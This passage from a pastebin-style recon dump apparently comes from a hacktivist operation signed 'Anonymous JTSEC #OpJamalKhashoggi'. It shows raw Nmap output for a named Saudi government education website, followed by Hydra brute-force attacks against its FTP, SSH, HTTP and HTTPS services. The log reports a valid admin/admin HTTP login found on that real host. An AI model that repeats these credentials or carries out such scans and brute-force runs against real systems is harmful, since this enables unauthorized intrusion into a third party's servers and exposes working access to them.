  2771. --------------------------------------------------------
  2772. +----------+--------------------+-------------------+----------+----------+
  2773. | App Name | URL to Application | Potential Exploit | Username | Password |
  2774. +----------+--------------------+-------------------+----------+----------+
  2775. +----------+--------------------+-------------------+----------+----------+
  2776. #######################################################################################################################################
  2777. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:16 EST
  2778. Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
  2779. Host is up (0.13s latency).
  2780. Not shown: 19 filtered ports, 3 closed ports
  2781. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2782. PORT STATE SERVICE
  2783. 21/tcp open ftp
  2784. 22/tcp open ssh
  2785. 80/tcp open http
  2786. 443/tcp open https
  2787. #######################################################################################################################################
  2788.  
  2789. + -- --=[Port 21 opened... running tests...
  2790. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2791.  
  2792. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:16:52
  2793. [DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
  2794. [DATA] attacking ftp://www.hbthedu.gov.sa:21/
  2795. [STATUS] 74.00 tries/min, 74 tries in 00:01h, 154 to do in 00:03h, 1 active
  2796. 1 of 1 target completed, 0 valid passwords found
  2797. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:19:46
  2798. + -- --=[Port 22 opened... running tests...
  2799. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2800.  
  2801. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:19:46
  2802. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
  2803. [DATA] attacking ssh://www.hbthedu.gov.sa:22/
  2804. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2805.  
  2806. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:19:46
  2807. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2808. [DATA] attacking ssh://www.hbthedu.gov.sa:22/
  2809. + -- --=[Port 23 closed... skipping.
  2810. + -- --=[Port 25 closed... skipping.
  2811. + -- --=[Port 80 opened... running tests...
  2812. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2813.  
  2814. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:19:47
  2815. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2816. [DATA] attacking http-get://www.hbthedu.gov.sa:80//
  2817. [80][http-get] host: www.hbthedu.gov.sa login: admin password: admin
  2818. [STATUS] attack finished for www.hbthedu.gov.sa (valid pair found)
  2819. 1 of 1 target successfully completed, 1 valid password found
  2820. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:20:03
  2821. + -- --=[Port 110 closed... skipping.
  2822. + -- --=[Port 139 closed... skipping.
  2823. + -- --=[Port 162 closed... skipping.
  2824. + -- --=[Port 389 closed... skipping.
  2825. + -- --=[Port 443 opened... running tests...
  2826. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2827.  
  2828. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:20:03
  2829. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2830. [DATA] attacking http-gets://www.hbthedu.gov.sa:443//
  2831. [STATUS] 90.00 tries/min, 90 tries in 00:01h, 1443 to do in 00:17h, 1 active
  2832. [STATUS] 89.33 tries/min, 268 tries in 00:03h, 1265 to do in 00:15h, 1 active
  2833. [STATUS] 88.86 tries/min, 622 tries in 00:07h, 911 to do in 00:11h, 1 active
  2834. [STATUS] 88.50 tries/min, 1062 tries in 00:12h, 471 to do in 00:06h, 1 active
  2835. 1 of 1 target completed, 0 valid passwords found
  2836. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:37:00
  2837. #######################################################################################################################################
  2838. Anonymous JTSEC #OpJamalKhashoggi Full Recon #13
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement